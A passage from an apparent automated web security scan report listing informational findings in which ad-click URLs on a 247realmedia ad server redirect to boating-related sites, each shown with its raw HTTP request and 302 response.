GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102804392/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:10 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.352. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.353. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2106371467/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.354. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:37:59 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.355. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2129286326/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.356. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:02:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.357. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/21461803/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:21 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.358. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.359. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:41:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.360. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/23350838/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:58 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.361. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/238495154/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.362. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.363. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/263374492/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:11:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.364. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/267480852/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:49:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.365. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/277699116/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
